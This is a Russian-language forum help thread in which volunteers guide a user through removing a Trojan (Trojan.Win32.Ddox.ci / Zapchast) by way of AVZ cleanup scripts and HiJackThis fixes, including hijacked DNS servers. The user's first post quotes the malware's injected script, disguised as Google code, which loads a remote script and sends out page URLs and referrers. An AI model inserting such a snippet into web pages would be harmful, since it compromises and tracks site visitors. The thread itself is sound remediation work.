-
Junior Member
- Вес репутации
- 57
Trojan.Win32.Ddox.ci и код "google"
Помогите пожалуйста удалить вирус.
В браузере появляется сообщение о Trojan.Win32.Ddox.ci
а так же в низ кода страницы перед /body добавляется код якобы google:
Код HTML:
<script>if(self==top){
document.write("<script src='http" +
(("https:" == document.location.protocol) ? "s" : "") +
"://sites.google.com/static.js?t=stat&ran=i1p8bGVNPxYwm9eeGX7op7jnlCuPEELvG3XrSO8j1WztJnDRqi8a2JxY7IN/b4KLBM18c5DhdoY_&r="+escape(document.referrer)+"&u="+escape(document.URL)+"&v=351&"+Math.random()+"'>"+unescape("%3C/script%3E"));}</script>
Еще не открывается вкладка "Сервис" в IE (но возможно это появилось раньше)
-
Будь в курсе!
Будь в курсе!
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
-
выполните скрипт
Код:
begin
SearchRootkit(true, true);
SetAVZGuardStatus(True);
QuarantineFile('C:\WINDOWS\system32\hbtante.dll','');
DeleteFile('C:\WINDOWS\system32\hbtante.dll');
BC_ImportDeletedList;
ExecuteSysClean;
ExecuteRepair(16);
BC_Activate;
RebootWindows(true);
end.
пришлите карантин согласно приложения 3 паравил
повторите логи
-
-
Junior Member
- Вес репутации
- 57
Большое спасибо!
А отсутствие возможности открыть вкладку "Сервис" в IE (пишет: Операция отменена из-из действующих ограничений), это не вирус?
-
-
-
Junior Member
- Вес репутации
- 57
-
Заразы в логах больше не видно.
Выполните скрипт в AVZ:
Код:
begin
ExecuteRepair(6);
ExecuteRepair(8);
RegKeyIntParamWrite( 'HKLM', 'SOFTWARE\Microsoft\Windows\CurrentVersion\policies\NonEnum', '{BDEADF00-C265-11D0-BCED-00A0C90AB50F}', 1);
RebootWindows(true);
end.
Компьютер перезагрузится.
Проверьте, решилась ли проблема с IE?
I am not young enough to know everything...
-
-
Junior Member
- Вес репутации
- 57
-
I am not young enough to know everything...
-
-
Junior Member
- Вес репутации
- 57
Спасибо, но и это не помогает...
-
195.226.220.30,195.226.220.31 - вы уверены что это ваши ДНС серверы ?
-
-
Junior Member
- Вес репутации
- 57
Если честно, я не знаю, что это и не совсем понимаю вопрос
-
Пофиксите в HiJack
Код:
O17 - HKLM\System\CCS\Services\Tcpip\..\{DB90DB92-0AB9-40F2-AB0C-EB62983F7DDB}: NameServer = 195.226.220.30,195.226.220.31
Если пропадет Интернет, посмотрите в договоре с провайдером (или позвоните в их техподдержку) правильные адреса DNS-серверов и пропишите их в настройках подключения к Интернет
Microsoft MVP 2012-2016 Consumer Security
Microsoft MVP 2016 Reconnect
-
-
Итог лечения
Статистика проведенного лечения:
- Получено карантинов: 1
- Обработано файлов: 1
- В ходе лечения обнаружены вредоносные программы:
- c:\\windows\\system32\\hbtante.dll - Trojan.Win32.Zapchast.fgg ( DrWEB: Trojan.Mayachok.based, BitDefender: Trojan.Generic.5795057, AVAST4: Win32:MalOb-HG [Cryp] )
-